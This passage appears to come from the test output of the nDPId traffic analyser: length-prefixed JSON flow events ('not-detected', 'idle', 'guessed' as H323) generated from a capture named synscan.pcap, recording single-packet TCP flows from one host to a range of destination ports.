-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 